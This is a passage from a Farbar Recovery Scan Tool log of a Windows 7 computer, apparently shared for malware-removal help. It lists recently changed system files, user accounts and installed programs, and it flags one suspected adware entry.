2020-01-15 21:37 - 2019-12-17 01:16 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-01-15 21:37 - 2019-12-17 01:14 - 015445504 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:14 - 001359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 01:14 - 000073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx
2020-01-15 21:37 - 2019-12-17 01:14 - 000060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2020-01-15 21:37 - 2019-12-17 01:13 - 000091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2020-01-15 21:37 - 2019-12-17 01:11 - 000168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2020-01-15 21:37 - 2019-12-17 01:10 - 000076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-01-15 21:37 - 2019-12-17 01:09 - 000279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-01-15 21:37 - 2019-12-17 01:08 - 000130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2020-01-15 21:37 - 2019-12-17 01:04 - 004859392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-01-15 21:37 - 2019-12-17 01:03 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-01-15 21:37 - 2019-12-17 01:02 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-01-15 21:37 - 2019-12-17 01:01 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:01 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:00 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 00:56 - 013838336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-01-15 21:37 - 2019-12-17 00:52 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:43 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-01-15 21:37 - 2019-12-17 00:41 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-01-15 21:37 - 2019-12-17 00:39 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:38 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-01-15 21:37 - 2019-12-12 04:35 - 000271872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:34 - 000253952 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-12 04:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:27 - 000284160 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-10 10:36 - 000375008 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2020-01-15 21:37 - 2019-12-10 09:38 - 001549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000544768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 003165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002319360 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000670208 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000583168 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:23 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000428544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 006136320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 002651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-01-15 21:37 - 2019-12-10 09:16 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serscan.sys
2020-01-15 21:37 - 2019-12-10 09:15 - 000594432 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:15 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:01 - 003233280 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-01-15 21:37 - 2019-12-10 08:56 - 000754176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-01-15 21:37 - 2019-12-10 07:17 - 007084032 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\Users\Public\Desktop\A bootable USB.lnk
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\ProgramData\Desktop\A bootable USB.lnk
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-02-07 20:54 - 2019-05-12 10:51 - 000000000 ____D C:\Program Files\SoftEther VPN Client
2020-02-07 20:54 - 2018-01-07 19:36 - 000000000 ____D C:\Users\Jomko\AppData\LocalLow\Mozilla
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:52 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-02-07 20:51 - 2009-07-14 06:13 - 000006170 _____ C:\Windows\system32\PerfStringBackup.INI
2020-02-07 20:51 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-02-07 20:49 - 2018-01-12 17:01 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2020-02-07 20:44 - 2018-01-07 19:33 - 000000000 __SHD C:\Users\Jomko\IntelGraphicsProfiles
2020-02-07 20:44 - 2018-01-07 19:27 - 000000000 ____D C:\ProgramData\NVIDIA
2020-02-07 20:44 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-02-07 20:41 - 2018-02-01 14:17 - 000000000 ____D C:\AdwCleaner
2020-02-06 21:09 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-02-06 21:09 - 2018-01-07 22:45 - 000003372 _____ C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
2020-02-06 21:09 - 2018-01-07 22:45 - 000003244 _____ C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
2020-01-26 22:57 - 2018-01-08 09:18 - 000001024 ____H C:\AMTAG.BIN
2020-01-26 21:01 - 2009-07-14 06:08 - 000032566 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-01-26 20:16 - 2018-06-15 20:12 - 000037692 _____ C:\Windows\ntbtlog.txt
2020-01-26 20:13 - 2009-07-14 05:45 - 000012288 _____ C:\Windows\system32\umstartup.etl
2020-01-26 15:18 - 2018-02-15 20:31 - 000000000 ____D C:\Users\Jomko\AppData\Local\CrashDumps
2020-01-24 21:54 - 2018-01-16 15:01 - 000000000 ____D C:\Windows\Minidump
2020-01-24 16:33 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\FileZilla
2020-01-23 00:40 - 2018-01-07 22:46 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-01-22 23:07 - 2018-01-11 14:10 - 000000000 ____D C:\ProgramData\Package Cache
2020-01-22 23:06 - 2018-01-07 22:53 - 000000000 ____D C:\Portable
2020-01-22 20:07 - 2018-05-28 20:39 - 000000000 ____D C:\Users\Jomko\Documents\Bluetooth Folder
2020-01-22 20:05 - 2009-07-14 03:34 - 000000215 _____ C:\Windows\system.ini
2020-01-22 20:04 - 2009-07-14 03:34 - 095895552 _____ C:\Windows\system32\config\SOFTWARE.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 023920640 _____ C:\Windows\system32\config\SYSTEM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 001847296 _____ C:\Windows\system32\config\DEFAULT.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000061440 _____ C:\Windows\system32\config\SAM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000028672 _____ C:\Windows\system32\config\SECURITY.bak
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\SysWOW64\NV
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\system32\NV
2020-01-22 17:10 - 2019-10-20 16:56 - 000000000 ____D C:\Users\Jomko\Desktop\Staré údaje Firefoxu
2020-01-22 15:00 - 2018-01-07 19:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-22 13:31 - 2018-01-11 23:49 - 000000000 ____D C:\Users\Jomko\AppData\Local\ElevatedDiagnostics
2020-01-22 13:31 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-01-21 17:06 - 2018-03-14 20:52 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-01-21 17:06 - 2018-02-13 09:42 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-21 17:06 - 2018-02-13 09:42 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-21 17:06 - 2018-02-13 09:42 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-21 17:06 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-21 11:02 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Local\FileZilla
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\Program Files\Java
2020-01-20 20:31 - 2019-05-24 18:27 - 000129088 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-01-18 12:45 - 2018-01-23 15:41 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\XnView
2020-01-17 14:13 - 2018-01-12 21:25 - 000004608 _____ C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-01-16 15:00 - 2018-01-08 09:18 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Standard Edition 6.6
2020-01-16 13:58 - 2019-03-29 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Logishrd
2020-01-16 13:58 - 2018-02-21 21:47 - 000000000 ____D C:\Users\Jomko\AppData\Local\Deployment
2020-01-15 23:15 - 2009-07-14 05:45 - 000360416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-01-15 21:45 - 2018-01-07 22:46 - 000000000 ____D C:\Windows\system32\MRT
2020-01-15 21:40 - 2018-01-07 22:46 - 120202352 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-01-08 00:08 - 2019-05-24 18:28 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\.minecraft
==================== Files in the root of some directories ========
2018-01-12 20:03 - 2018-01-12 20:03 - 000000437 _____ () C:\Users\Jomko\AppData\Roaming\ImageTuner.ini
2018-01-12 21:25 - 2020-01-17 14:13 - 000004608 _____ () C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-01-10 00:20 - 2018-01-10 00:20 - 000000001 _____ () C:\Users\Jomko\AppData\Local\llftool.4.40.agreement
2019-07-15 23:58 - 2019-07-15 23:58 - 000015468 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel
2019-07-11 06:58 - 2019-07-11 06:58 - 000012216 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel.NCNJ4Z
2018-03-22 16:27 - 2019-04-14 22:21 - 000007610 _____ () C:\Users\Jomko\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
LastRegBack: 2020-01-18 14:26
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-02-2020 02
Ran by Jomko (07-02-2020 20:56:59)
Running from C:\Users\Jomko\Desktop
Windows 7 Professional Service Pack 1 (X64) (2018-01-07 16:45:09)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-1214245489-2610092731-2950206201-500 - Administrator - Disabled)
Guest (S-1-5-21-1214245489-2610092731-2950206201-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1214245489-2610092731-2950206201-1002 - Limited - Enabled)
Jomko (S-1-5-21-1214245489-2610092731-2950206201-1000 - Administrator - Enabled) => C:\Users\Jomko
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}) (Version: - Microsoft)
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0015-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0016-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0018-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0019-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001A-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001B-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0405-0000-0000000FF1CE}_PROPLUS_{3C3813E1-C370-4F32-9639-8B43C7C780CD}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0407-0000-0000000FF1CE}_PROPLUS_{2AB528A5-BB1B-4EBE-8E51-AD0C4CD33CA9}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-0409-0000-0000000FF1CE}_PROPLUS_{3EC77D26-799B-4CD8-914F-C1565E796173}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-040E-0000-0000000FF1CE}_PROPLUS_{685D17E5-D868-4A77-B58E-255DEBA78262}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-001F-041B-0000-0000000FF1CE}_PROPLUS_{F67648A4-713E-4298-BBAD-A83D8283B0F3}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_PROPLUS_{00C5525B-3CB3-467D-8100-2E6FB306CD86}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-002A-041B-1000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-0044-041B-0000-0000000FF1CE}_PROPLUS_{B1A00287-698E-48D0-8C8F-A3387C2B8C45}) (Version: - Microsoft) Hidden
2007 Microsoft Office Suite Service Pack 1 (SP1) (HKLM-x32\...\{90120000-006E-041B-0000-0000000FF1CE}_PROPLUS_{FE295FA2-72FC-4859-85B3-0E6685DB13A4}) (Version: - Microsoft) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Slovak (HKLM-x32\...\{AC76BA86-7AD7-1051-7B44-AC0F074E4100}) (Version: 19.021.20061 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.321 - Adobe)
Aktualizácie NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
ANT Drivers Installer x64 (HKLM\...\{C14C3A1D-B5B3-41BB-9358-6FEA3FC642AF}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AOMEI Partition Assistant Standard Edition 6.6 (HKLM-x32\...\{02F850ED-FD0E-4ED1-BE0B-54981f5BD3D4}_is1) (Version: - AOMEI Technology Co., Ltd.)
Apple Mobile Device Support (HKLM\...\{6CECF0FB-EE71-4FE5-8AE0-FA007408934A}) (Version: 13.0.0.38 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Ashampoo PDF Pro (HKLM-x32\...\{0A11EA01-9906-0D0E-7868-3381FE134510}_is1) (Version: 1.0.7 - Ashampoo GmbH & Co. KG)
Bitvise SSH Client - FlowSshNet (x64) (HKLM\...\{0F4F44AB-C022-466B-9836-8EB4344E481F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client - FlowSshNet (x86) (HKLM-x32\...\{F9932D09-05BF-4FB8-B748-094EC2B3FC1F}) (Version: 8.38.0.0 - Bitvise Limited) Hidden
Bitvise SSH Client 8.38 (remove only) (HKLM-x32\...\BvSshClient) (Version: 8.38 - Bitvise Limited)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.4.0.96 - Meno vašej spoločnosti)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CloudNet (HKU\S-1-5-21-1214245489-2610092731-2950206201-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Elevated Installer (HKLM-x32\...\{B11981DA-5AEA-459F-978A-F99541F77AD5}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
FileZilla Client 3.46.3 (HKLM-x32\...\FileZilla Client) (Version: 3.46.3 - Tim Kosse)
Free FLAC to MP3 Converter 1.4 (HKLM-x32\...\{A54C01BD-1277-4722-B42B-EC9800A90B1E}_is1) (Version: 1.4 - PolySoft Solutions)
Free ZIP Password Recovery (HKLM-x32\...\{AF4ED478-C15D-4D4D-95E4-70C15F963729}) (Version: 3.70.69 - KRyLack Software)
Garmin Express (HKLM-x32\...\{4cc2749e-1c2a-4f48-abdf-c17069bac4da}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{9BE7B09F-C8D2-4B1E-B83E-7387FDDA8BCD}) (Version: 6.15.0.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.130 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.441 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.21.169 - Google Inc.) Hidden
Hard Disk Low Level Format Tool 4.40 (HKLM-x32\...\Hard Disk Low Level Format Tool_is1) (Version: - HDDGURU)
HP Dropbox Plugin (HKLM-x32\...\{9646F2DC-B09E-4314-92EC-B3332900A7EE}) (Version: 36.0.191.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{AF9F1F16-F6B4-4A66-B789-9F00B40B08AF}) (Version: 43.0.191.0 - HP)
HP FTP Plugin (HKLM-x32\...\{7DB5EDF6-8009-4E01-AF0D-4F3E02A0287F}) (Version: 43.0.191.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{07F30E12-A85F-4EA4-A5B3-3728FAB947ED}) (Version: 36.0.191.0 - HP)
HP LaserJet MFP M28-M31 Basic Device Software (HKLM\...\{08644094-D714-4B6E-9CEB-11433F5CBDB7}) (Version: 46.2.2636.18185 - HP Inc.)
HP LaserJet MFP M28-M31 Help (HKLM-x32\...\{0DF6621D-67C2-4E12-A5CF-260E985B8743}) (Version: 0.00.0005 - HP)
HP OneDrive Plugin (HKLM-x32\...\{8ED0A60F-9F44-4B7F-9C88-CC9E0B362628}) (Version: 36.0.191.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{1F0191BF-E339-4192-85D9-C369CA3FE9F1}) (Version: 43.0.191.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{96DB7179-0B69-45E1-A109-3A3A1F5BBCDF}) (Version: 43.0.191.0 - HP)
I.R.I.S OCR (HKLM-x32\...\{3913CCF7-436B-4A7A-A265-62E9FFDD03D9}) (Version: 15.2.10.1114 - HP Inc.)
iCloud (HKLM\...\{28ABC5D7-AF47-4476-A6AA-C2DD822ED40F}) (Version: 7.9.0.9 - Apple Inc.)
ID3 Tag Editor (HKLM-x32\...\{671DC096-9262-4943-A3D8-ED8A757B60D5}_is1) (Version: - id3tageditor.com)
Inside (HKLM-x32\...\{9BD4503F-F711-491D-984A-AB4ABD66B8C2}_is1) (Version: - Playdead)
